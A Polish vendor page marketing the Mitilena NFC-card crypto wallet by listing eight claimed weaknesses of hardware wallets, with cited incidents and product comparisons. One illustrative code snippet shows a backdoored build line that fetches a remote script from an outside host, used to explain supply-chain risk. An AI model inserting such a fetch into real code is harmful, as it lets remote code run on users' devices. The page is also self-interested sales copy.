8 luk Otwarty kod Checklista FAQ
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS Utwórz portfelUtwórz
Portfele sprzętowe · nieoczywiste luki

Nieoczywiste luki portfela sprzętowego

Kupujesz urządzenie, żeby zamknąć dziury. Wraz z nim przychodzą nowe: firmware, aktualizacje, usługa na komputerze, ekran, pudełko, konto u sprzedawcy. Osiem szczegółów, które recenzje wpisują jako zalety — i osiem sposobów, którymi przez nie wyprowadzano pieniądze w latach 2020–2026.

Prawdziwe incydenty z datami i kwotami Według dokumentacji producentów Nasz zestaw oceniamy według tej samej listy
Cena błędusprawy publiczne
2026Coldcard · słaba losowość w firmware$100M+
2025Bybit · podpisujący podpisali to, czego nie widzieli$1.5B
2024Dark Skippy · wyciek seeda przez dwa podpisybadanie
2023Ledger Connect Kit · backdoor w bibliotece$600K
2021Fałszywa aplikacja portfela w App Store17,1 BTC
2020Wyciek bazy klientów Ledger · phishing przez lata270 000 osób
Osiem luk

Każdy szczegół chwalony w recenzjach to osobna dziura

Portfel sprzętowy zamyka jedną dziurę: klucz nie siedzi już na telefonie z internetem. Ale urządzenie nie jest puste. Ma firmware, aktualizacje, program desktopowy, ekran, pudełko, sprzedawcę z Twoim adresem — i każdy szczegół dodaje powierzchnię ataku, której wcześniej nie było. Poniżej osiem takich szczegółów: co mówią recenzje, jak przez nie wyprowadzano pieniądze, jak zamknąć lukę i czy nasz zestaw ma tę cechę.

Luka 01

Firmware, który tworzy Twój klucz

W recenzjach: «bezpieczny chip — klucz powstaje w urządzeniu i nigdy go nie opuszcza»

Klucz to ogromna losowa liczba, a tworzy ją firmware. Jeden błąd tam — i kluczy jest znacznie mniej, niż myślisz: łamie się je brute-force’em u wszystkich właścicieli naraz, bez dostępu do urządzenia, lata po zakupie. Chip nie ma znaczenia; dziura siedzi nad nim.

Incydent
$100M+
Coldcard, lipiec 2026: błąd w buildzie firmware od 2021 cicho podmienił sprzętowy RNG na słaby, seedowany z numeru seryjnego urządzenia i timera. Siła klucza spadła do ok. 40 bitów; opróżniono ponad 5000 adresów.
Jak zamknąć lukę
Czy możesz wnieść własną losowość: rzuty kością, własną frazę. Portfel, który przyjmuje entropię od Ciebie, nie zależy od jednego błędu firmware.
Tej cechy u nas nie ma
Na karcie nie ma firmware — to zaszyfrowany nośnik. Mitilena Air tworzy klucz z systemowego RNG urządzenia, a zamiast losowych słów możesz ustawić własną frazę seed.
Luka 02

Aktualizacje, które musisz instalować

W recenzjach: «producent regularnie wysyła aktualizacje bezpieczeństwa»

Każda aktualizacja to moment, w którym można podmienić firmware. Zmanipulowany firmware chowa fragmenty seeda w dwóch–trzech zwykłych podpisach, a urządzenie z zewnątrz wygląda normalnie. Pomijanie aktualizacji też nie jest wyjściem: te same aktualizacje łatają dziury.

Incydent
2 podpisy
Dark Skippy, sierpień 2024: badacze pokazali, że złośliwy firmware portfela sprzętowego może wyciągnąć cały seed przez dwie transakcje. Wystarczy jedna aktualizacja z niewłaściwego źródła.
Jak zamknąć lukę
Skąd pochodzi firmware i czy urządzenie weryfikuje jego podpis. Najlepiej, gdy nie ma czego aktualizować.
Tej cechy u nas nie ma
Na karcie nie ma nic do aktualizacji ani podmiany. Podpis odbywa się w aplikacji na telefonie; jej buildy są podpisane i pochodzą z App Store oraz Google Play — jak każda aplikacja, którą sam widzisz i zamykasz.
Luka 03 · Poczuj absurd
W recenzjach: «wygodna aplikacja desktopowa producenta»

Portfel dla niedowierzających, który dostarcza usługę w tle

Kupujesz urządzenie z jednego powodu: żeby przestać ufać komputerowi. Żeby działało, musisz zainstalować usługę w tle na tym samym komputerze. Nie napisałeś jej, nie uruchomiłeś i nie kontrolujesz: startuje z systemem, słucha na porcie, do którego może dobić się dowolny program na maszynie, i właśnie coś robi — dokładnie co, nie wiesz i nigdy nie sprawdzisz.

Działała w tle po zamknięciu portfela. Przez lata. U jednego z największych producentów była to osobna usługa «bridge»; w 2025 schowali ją w samej aplikacji — usługa nadal jest, tylko umiera wraz z oknem. U większości innych bez programu desktopowego urządzenie to breloczek. Na Linuksie dodaj reguły udev, inaczej system nie odda USB.

Więc rzecz, którą kupiłeś, żeby nie zależeć od programów na komputerze, nie działa bez programu na komputerze. I nie tego, który widzisz — tego, który działa pod spodem.

Tej cechy u nas nie ma
Na komputerze nic się nie instaluje: ani usługa, ani sterownik, ani port. Pośrednik to chip NFC już w telefonie, od jego producenta, pod kontrolą systemu: działa tylko gdy aplikacja jest otwarta i sam przykładasz kartę, a telefon za każdym razem pyta o zgodę. Karta jest pasywna: bez baterii, bez radia, sama nic nie robi. Zamkniesz aplikację — nie zostaje nic, co działa bez Ciebie. Szczerze: aplikacja na telefon nadal jest potrzebna, i jest jak każda inna — widzisz ją, uruchamiasz i sam zamykasz. Nikt nie mieszka w pomieszczeniu gospodarczym.
System monitorWALLET CLOSED
ProcesStanUptime
HW Wallet Appwallet
zamknięta przez Ciebie-
hwwalletdusługa w tle · most USB
działa412d 06:14
uruchomiona przez system przy logowaniunie da się zamknąć — to usługa
Makieta; nazwy poglądowe. Tak wyglądał komputer z jednym z najpopularniejszych portfeli USB przed 2025; potem «bridge» wbudowano w samą aplikację — ta sama usługa, tylko już niewidoczna na liście.
Alegoria
Dom dla prywatności — i lokator w pomieszczeniu gospodarczym

Chciałeś domu dla prywatności. Kupiłeś. Potem potrzebowałeś ochrony — zainstalowano. A żeby plan ochrony działał, poprosili, byś wpuścił do domu człowieka w mundurze, który mieszka w Twoim pomieszczeniu gospodarczym całą dobę, ma klucze do wszystkich drzwi i raportuje komuś innemu. Nie zatrudniłeś go, nie możesz go zwolnić, a co robi w nocy — nie wiesz.

Jest «swój», oczywiście. Tak stoi w umowie. Chciałeś prywatności, a dostałeś surogat: dom z lokatorem, którego nie wybierałeś.

Luka 04 · Otwarty kod to nie audyt
W recenzjach: «open source — każdy może sprawdzić»

Otwarty kod to sposób, w jaki programiści pracują razem, a nie odznaka, że program nie kradnie

Otwarty kod wymyślono, żeby ludzie dzielili się programami i naprawiali je razem. Jako narzędzie współpracy jest świetny. Nigdy nie był pieczęcią jakości «to oprogramowanie nie ukradnie Ci pieniędzy», i oto dlaczego: nie używasz kodu źródłowego. Używasz tego, co pobrałeś.

Między repozytorium na GitHubie a plikiem na telefonie stoją build, sklep z aplikacjami, aktualizacja, serwer. Na którymkolwiek z tych etapów do kodu może wejść jedna linia, która ściąga cokolwiek skądkolwiek — i nie będzie jej w repozytorium. Nie porównasz swojej kopii ze źródłem: sklepy dają skompilowany plik; portfel webowy dostaje kod, który serwer dziś zechciał Ci podać; rozszerzenie przeglądarki aktualizuje się po cichu w nocy.

«Otwarte» znaczy, że ktoś może sprawdzić jakąś wersję któregoś dnia. Co robi Twoja kopia właśnie teraz — tego nie znaczy.

W repozytorium · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Na Twoim telefonie · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
Jedna linia w buildzie. Nie ma jej w repozytorium, niewidoczna w sklepie, działa na Twoim urządzeniu.
Otwartość nie zatrzymała żadnej z tych spraw
Ledger Connect Kit2023
otwarta biblioteka na GitHubie; złośliwa wersja trafiła na npm; dziesiątki stron załadowały ją na żywo w ciągu godzin
Copay / event-stream2018
otwarty portfel; backdoor wszedł przez zależność celowaną właśnie w niego
xz utils2024
otwarte przez dwadzieścia lat; backdoor siedział w release’ach, aż jeden inżynier zauważył, że logowanie SSH jest o pół sekundy wolniejsze
Coldcard2026
firmware open-source; błąd w buildzie przez pięć lat podmieniał sprzętowy RNG na słaby — klucze łamane brute-force bez dostępu do urządzenia, ponad 5000 adresów, $100M+
Co naprawdę działa
Nie czytanie cudzego kodu — dwie kontrole, które każdy może zrobić. Po pierwsze, audyt zachowania: postaw na komputerze proxy przechwytujące, przepuść przez nie aplikację i patrz, co dokąd wysyła. Nie musisz czytać kodu — ruch widać w całości. Po drugie, architektura, w której kodowi nie ma co kraść: jeśli klucz nigdy nie siedzi na urządzeniu z siecią, dowolna linia w dowolnej aktualizacji jest bezsilna — nie ma czego wysłać.
Jak to robimy
Pierwszą oferujemy sami: przepuść naszą aplikację przez proxy, wersję webową przez DevTools przeglądarki i sprawdź każde żądanie. Klucz do podpisu i seed się nie pojawią; jedyny wyjątek to Monero view key — opisany na stronie «jak wychodzi przelew». Druga jest w zestawie: klucz rodzi się w Mitilena Air na urządzeniu bez internetu, żyje na karcie, a do aplikacji online trafia tylko podpis — nie ma już czego proxy’ować. I offline tu jest prawdziwy: w trybie air-gap urządzenie z kluczem nie jest z niczym połączone — ani kabel, ani Bluetooth; transakcja wchodzi i wychodzi jako kod QR, który widzisz na własne oczy. Nie «zimny» portfel na kablu wiszący przy komputerze online z własną usługą wymieniającą kto wie co.
Luka 05

Ekran, na którym nie widać, co podpisujesz

W recenzjach: «potwierdź na ekranie urządzenia — wirus na komputerze jest bezsilny»

Ekran jest maleńki i często pokazuje hash albo «contract call», a nie adres i kwotę. Potwierdzasz to, czego nie widzisz — a podpis i tak jest uczciwy, Twój. Ekran daje poczucie kontroli, której nie ma.

Incydent
$1.5B
Bybit, luty 2025: podpisujący z portfelami sprzętowymi potwierdzili przelew, który w UI wyglądał zwyczajnie. Urządzenia pokazywały dane, których człowiek nie mógł zweryfikować.
Jak zamknąć lukę
Odbiorca, kwota i typ operacji ludzkim językiem — nie hash — oraz odrzucenie jednym przyciskiem.
Jak to robimy
Ekran jest, ale to ekran telefonu: adres, kwota i typ żądania słowami — przelew, wywołanie kontraktu, approval — oraz przycisk Odrzuć. Przy dużych kwotach — osobne urządzenie offline, które dostaje pełną transakcję.
Luka 06

Pudełko, w którym już jest seed

W recenzjach: «wysyłany w zapieczętowanym pudełku z plombą»

Fizyczne urządzenie oznacza wysyłkę, pośredników i «promocyjne» marketplace’y. Portfel przychodzi już ustawiony, z seedem na kartce w środku. Albo podobna aplikacja w sklepie prosi, by «wpisać seed w celu aktywacji».

Incydent
17,1 BTC
App Store, 2021: właściciel portfela sprzętowego wpisał seed do podobnej aplikacji i stracił 17,1 BTC. W tym samym roku, po wycieku bazy, klientom Ledger wysyłano fałszywe urządzenia z listem «przenieś seed na nowe».
Jak zamknąć lukę
Zainicjuj sam i nigdy nie używaj seeda, który przyszedł już zapisany. Plomba to nie weryfikacja; weryfikacją jest to, że klucz tworzysz Ty.
Jak to robimy
Karty przychodzą puste: klucz tworzysz i zapisujesz sam — w pudełku nie może być gotowego seeda. Aplikacja tylko z App Store i Google Play przez linki na stronie; o seed prosi wyłącznie przy imporcie i podpisie.
Luka 07

Konto u sprzedawcy

W recenzjach: «oficjalna gwarancja, wsparcie i konto osobiste»

Żeby kupić urządzenie, dajesz producentowi imię, e-mail i adres wysyłki. Twoje bezpieczeństwo zależy teraz od ich bazy. Jeśli wycieknie — przez lata będziesz dostawać wiadomości «potwierdź seed na nowym urządzeniu», czasem z paczkami.

Incydent
270 000 osób
Ledger, 2020: wyciekły dane 270 000 kupujących, w tym adresy pocztowe. Maile, telefony i paczki z prośbą o «migrację» seeda trwają do dziś.
Jak zamknąć lukę
Im mniej o Tobie wiedzą, tym krótszy wektor: kupuj bez konta, wsparcie, które nigdy nie prosi o seed, i zasada «o seed prosi tylko złodziej».
Tej cechy u nas nie ma
Portfel działa bez rejestracji — bez konta. Sprzedawca zna tylko adres wysyłki. Ani wsparcie, ani aplikacja nie proszą o seed.
Luka 08

Jedno urządzenie i jedna kartka

W recenzjach: «wytrzymała obudowa, duży ekran, bateria na tydzień»

Im więcej części, tym więcej awarii: złącze, ekran, bateria. Odzyskanie wisi na jednej kartce z seedem — zamoczonej, zgubionej przy przeprowadzce, sfotografowanej «na wszelki wypadek». Najczęstsza przyczyna utraty to nie hakowanie.

Incydent
≈20 % BTC
Chainalysis szacuje, że około jednej piątej całego bitcoina jest stracona na zawsze — głównie przez utracone klucze, nie hakowania.
Jak zamknąć lukę
Ile kopii klucza jest w pudełku i w jakiej formie, co się dzieje przy utracie urządzenia i czy jest w nim coś, co może się zepsuć.
Tej cechy u nas nie ma
Bez ekranu, baterii i złącza — nie ma czego zepsuć. I nie jedna kopia: pięć lustrzanych w pudełku — dwie karty NFC i trzy naklejki stealth w wodoodpornym plastiku, trwałość 10+ lat.
Checklista

Czego nie powinno być w portfelu

Osiem szczegółów na osiem luk. Lista pasuje do każdego portfela — sprzętowego, mobilnego, przeglądarkowego. Odznacz, co ma ten, który wybierasz — i nasz też.

01
Klucz tworzony wyłącznie przez oprogramowaniebez własnej losowości — Twojej frazy lub kości
02
Aktualizacje tam, gdzie żyje kluczkażda aktualizacja to szansa na podmianę kodu
03
Usługa, sterownik lub port na komputerzezobacz lukę 03
04
Odznaka «open source» zamiast architekturyklucz siedzi tam, gdzie sięga cudzy kod
05
Ekran pokazujący hash zamiast adresu i kwotyi bez przycisku Odrzuć
06
Seed, który przyszedł już zapisanyw pudełku, w liście, w «aplikacji aktywacyjnej»
07
Konto u sprzedawcyi wsparcie, które może prosić o seed
08
Jedna kopia i części, które się psująekran, bateria, złącze, jedna kartka
Na tej liście zestaw Ultimate nie ma żadnej z ośmiu cech. W pudełku: 2 karty NFC i 3 naklejki stealth, Mitilena Air (klucze bez internetu) oraz Mitilena Keys (podpis bez internetu). Karty przychodzą puste: klucz tworzysz i szyfrujesz Ty — nie fabryczny chip. Zawartość i cena →
Ultimate · zestaw offline

Nie fabryczny «secure chip» — nośnik, który szyfrujesz Ty

Karty przychodzą puste. Klucz tworzysz w Mitilena Air na telefonie bez internetu i zapisujesz sam. Podpis przez Mitilena Keys, też offline: transakcja idzie QR-em. Pięć identycznych kopii w pudełku: 2 karty NFC i 3 naklejki stealth w wodoodpornym plastiku. 18 sieci, ponad 20 000 monet, w tym USDT.

Nic nie instaluje się na komputerze
Bez firmware, aktualizacji, ekranu i baterii
Transakcja na telefon offline — dźwiękiem lub QR, bez kabla i USB
Działa z darmową aplikacją Mitilena na telefon
Wodoodporny plastik, trwałość 10+ lat
Wysyłka na cały świat · mitilena-store.com
Karta NFC Mitilena
Ultimate · generowanie i podpis offline
€369€439
2 karty NFC · 3 naklejki stealth · Mitilena Air · licencja Mitilena Keys
Kup Ultimate · €369 Basic i Premium — zobacz wszystkie plany
FAQ

O co pytają po przeczytaniu do tego miejsca

Portfel sprzętowy — wady i zalety w skrócie?

Jedna duża zaleta: klucz nie siedzi na telefonie z internetem. Wady to osiem szczegółów powyżej — każdy dodaje powierzchnię ataku. Dobry portfel sprzętowy to ten z mniejszą liczbą cech, nie większą.

Co jeśli telefon jest skompromitowany?

Z kartą na głównym telefonie klucz pojawia się w izolowanym środowisku na sekundę podpisu — to samo ryzyko co w każdym portfelu telefonicznym, tylko krócej. Przy kwotach, które Cię przerażają — druga warstwa: podpis na osobnym urządzeniu offline, do którego transakcja dociera QR-em.

Co jeśli kartę ukradną lub zgubisz?

Bez hasła karta i naklejka to bezużyteczny plastik — klucz na nich jest zaszyfrowany. Utracona kopia zastępowana jest pozostałymi czterema: dwie karty i trzy naklejki z pudełka to lustra.

Czy trzeba aktualizować firmware portfela sprzętowego?

Jeśli producent zamknął dziurę — tak, i właśnie wtedy można podmienić firmware: sprawdź źródło i podpis. Nośnik bez firmware nie ma takiego dylematu — nie ma czego aktualizować ani podmienić.

Czym to się różni od portfela USB?

Mniej pośredników: bez kabla, sterownika, usługi w tle i programu desktopowego. Jeden pośrednik — chip NFC Twojego telefonu — i odpowiada Tobie oraz systemowi, nie sprzedawcy portfela.

Open source znaczy bezpiecznie?

Znaczy: możliwe do sprawdzenia przez kogoś, kiedyś. Używasz nie kodu, lecz tego, co pobrałeś, i jednego z drugim nie porównasz. Bezpieczeństwo bierze się z architektury, w której klucz nie siedzi tam, gdzie sięga cudzy kod.

Karty NFC z generowaniem i podpisem offline

Kup Ultimate · €369 Utwórz darmowy portfel